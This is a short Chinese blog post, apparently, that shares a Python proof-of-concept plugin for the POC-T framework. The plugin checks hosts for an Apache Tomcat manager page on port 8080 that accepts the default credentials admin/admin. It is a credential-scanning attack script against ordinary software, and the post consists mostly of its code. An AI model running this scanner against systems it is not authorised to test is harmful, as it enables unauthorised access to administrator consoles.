这篇文章上次修改于 1234 天前,可能其部分内容已经发生变化,如有疑问可询问作者。

简易版的,直接贴代码吧。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
#author:r3m1x

import requests
import sys

def poc(url):
    url = url if '://' in url else 'http://' + url
    if url[-1] != '/': url += ':8080/'
    vuln_url = url + "manager/html"
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0','Connection': "close"}
    try:
        req = requests.get(vuln_url, auth=('admin', 'admin'),headers=headers,verify=False,timeout=2)
        if req.status_code == 200:
            return True
            req.keep_alive = False
    except Exception:
        pass
    return False

效果图: